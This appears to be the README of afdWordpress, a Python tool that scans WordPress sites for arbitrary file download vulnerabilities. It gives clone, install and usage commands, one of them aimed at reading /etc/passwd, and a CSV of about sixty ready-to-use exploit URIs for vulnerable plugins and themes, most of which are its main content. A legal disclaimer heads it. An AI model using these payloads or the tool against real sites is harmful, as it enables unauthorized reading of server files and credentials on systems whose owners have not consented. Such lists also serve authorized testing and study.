+ Autor: MrCl0wn
+ Blog: http://blog.mrcl0wn.com
+ GitHub: https://github.com/MrCl0wnLab
+ Twitter: https://twitter.com/MrCl0wnLab
+ Email: mrcl0wnlab\@\gmail.com
+------------------------------------------------------------------------------+
| [!] Legal disclaimer: Usage of afdWordpress for attacking |
| targets without prior mutual consent is illegal. |
| It is the end user's responsibility to obey all applicable |
| local, state and federal laws. |
| Developers assume no liability and are not responsible for any misuse or |
| damage caused by this program |
+------------------------------------------------------------------------------+
This tool aims to facilitate checking arbitrary file download vulnerability
threading
argparse
csv
collections
random
urllib
$ git clone https://github.com/MrCl0wnLab/afdWordpress
$ cd afdWordpress
$ pip3.7 install -r requirements.txt
$ git clone https://github.com/MrCl0wnLab/afdWordpress
$ cd afdWordpress
$ python3.7 afd.py --help
▄████████ ▄████████ ████████▄
███ ███ ███ ███ ███ ▀███
███ ███ ███ █▀ ███ ███
███ ███ ▄███▄▄▄ ███ ███
▀███████████ ▀▀███▀▀▀ ███ ███
███ ███ ███ ███ ███
███ ███ ███ ███ ▄███
███ █▀ ███ ████████▀
Arbitrary File Download-[ Verifier ]
By MrCl0wn
usage: tool [-h] --url http://url [--file /file.php] [--threads 10]
optional arguments:
-h, --help show this help message and exit
--url http://url URL to request Ex: http://www.host.com
--file /file.php File to fuzzing Ex: /wp-admin.php
--threads 10 Threads
$ python3.7 afd.py --url https://blog.mrcl0wn.com
$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50
$ python3.7 afd.py --url https://blog.mrcl0wn.com --thread 50 --file /etc/passwd
File: inject.csv
| exploit_uri | pwd_count | ref |
|---|---|---|
| /?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=PWD__FILE | 4 | |
| /?mdocs-img-preview=PWD__FILE | 3 | |
| /mdocs-posts/?mdocs-img-preview=PWD__FILE | 3 | |
| /wp-admin/admin-ajax.php?action=kbslider_show_image&img=PWD__FILE | 1 | |
| /wp-admin/admin-ajax.php?action=revslider_show_image&img=PWD__FILE | 0 | |
| /wp-admin/admin-ajax.php?action=revslider_show_image&img=PWD__FILE | 1 | |
| /wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=PWD__FILE&order=name&srt=yes | 0 | |
| /wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=PWD__FILE | 1 | |
| /wp-admin/tools.php?content=&wp-attachment-export-download=true | 0 | https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html |
| /wp-admin/tools.php?content=attachment&wp-attachment-export-download=true | 0 | https://packetstormsecurity.com/files/132693/WordPress-WP-Attachment-Export-0.2.3-Arbitrary-File-Download.html |
| /wp-content/force-download.php?file=PWD__FILE | 0 | |
| /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=PWD__FILE | 0 | |
| /wp-content/plugins//asgallDownload.php?imgname=PWD__FILE | 3 | |
| /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=PWD__FILE | 3 | |
| /wp-content/plugins/allow-l10n-upload-filename/download.php?id=PWD__FILE | 3 | |
| /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=PWD__FILE | 3 | |
| /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=PWD__FILE | 2 | |
| /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=PWD__FILE | 3 | |
| /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=PWD__FILE | 10 | |
| /wp-content/plugins/count-per-day/download.php?n=1&f=PWD__FILE | 0 | |
| /wp-content/plugins/document_manager/views/file_download.php?fname=PWD__FILE | 2 | |
| /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=PWD__FILE&file_size=10 | 4 | |
| /wp-content/plugins/history-collection/download.php?var=PWD__FILE | 3 | |
| /wp-content/plugins/hwm_board/download.php?filename=PWD__FILE | 0 | |
| /wp-content/plugins/hwm_board/download.php?filename=PWD__FILE&fileNa=PWD__FILE | 0 | |
| /wp-content/plugins/image-export/download.php?file=PWD__FILE | 0 | |
| /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/PWD__FILE | 0 | |
| /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/PWD__FILE | 0 | |
| /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/PWD__FILE | 0 | |
| /wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=PWD__FILE | 0 | |
| /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=PWD__FILE | 6 | |
| /wp-content/plugins/recent-backups/download-file.php?file_link=PWD__FILE | 0 | |
| /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=PWD__FILE&path=PWD__FILE | 7 | |
| /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=PWD__FILE | 7 | |
| /wp-content/plugins/sermon-shortcodes/download.php?file=PWD__FILE | 0 | https://packet..com/files/150507/...bitrary-File-Download.html |
| /wp-content/plugins/uploadingdownloading-non-latin-filename/download.php?id=PWD__FILE | 0 | https://cxsecurity.com/issue/WLB-2018110241 |
| /wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=PWD__FILE | 3 | https://dl.packe...503-exploits/wpaspose-disclose.txt |
| /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=PWD__FILE | 9 | https://www.exploit-db.com/exploits/37530 |
| /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=PWD&filename=FILE&action=download | 2 | https://wp.com/vulnerabilities/6499 |
| /wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=PWD__FILE&name=PWD__FILE | 0 | |
| /wp-content/plugins/wp-swimteam/include/user/download.php?file=PWD__FILE&filename=PWD__FILE&contenttype=text/html&transient=1&abspath=/usr/share/wordpress | 0 | https://www.exploit-db.com/exploits/37601 |
| /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=PWD__FILE | 0 | |
| /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/PWD__FILE | 0 | |
| /wp-content/themes/antioch/lib/scripts/download.php?file=PWD__FILE | 5 | |
| /wp-content/themes/authentic/includes/download.php?file=PWD__FILE | 4 | |
| /wp-content/themes/churchope/lib/downloadlink.php?file=PWD__FILE | 4 | |
| /wp-content/themes/epic/includes/download.php?file=PWD__FILE | 0 | |
| /wp-content/themes/erinvale/download.php?file=PWD__FILE | 3 | https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt |
| /wp-content/themes/felis/download.php?file=PWD__FILE | 0 | |
| /wp-content/themes/fiestaresidences/download.php?file=PWD__FILE | 3 | https://dl.packe.../1808-exploits/wpdreamsmiths-disclose.txt |
| /wp-content/themes/hsv/download.php?file=PWD__FILE | 3 | https://dl.packet.../1808-exploits/wpdreamsmiths-disclose.txt |
| /wp-content/themes/linenity/functions/download.php?imgurl=PWD__FILE | 4 | |
| /wp-content/themes/lote27/download.php?download=PWD__FILE | 3 | |
| /wp-content/themes/markant/download.php?file=PWD__FILE | 2 | |
| /wp-content/themes/MichaelCanthony/download.php?file=PWD__FILE | 3 | |
| /wp-content/themes/mTheme-Unus/css/css.php?files=PWD__FILE | 4 | |
| /wp-content/themes/NativeChurch/download/download.php?file=PWD__FILE | 4 | |
| /wp-content/themes/optimus/download.php?file=PWD__FILE | 3 | https://dl.pac.../1808-exploits/wpdreamsmiths-disclose.txt |
| /wp-content/themes/SMWF/inc/download.php?file=PWD__FILE | 0 | |
| /wp-content/themes/TheLoft/download.php?file= | 3 | |
| /wp-content/themes/trinity/lib/scripts/download.php?file=PWD__FILE | 5 | |
| /wp-content/themes/urbancity/lib/scripts/download.php?file=PWD__FILE | 5 | |
| /wp-content/themes/yakimabait/download.php?file=PWD__FILE | 0 |
| exploit_uri | pwd_count | ref |
|---|---|---|
| url_exploit_get | count_mount_pwd | ref_exploit |
exploit_uri: Request get for exploration and concatenation with target_url.
pwd_count: Count pwd for concatenation loop.
ref: This column is referential document.
ok-file.log
error-file.log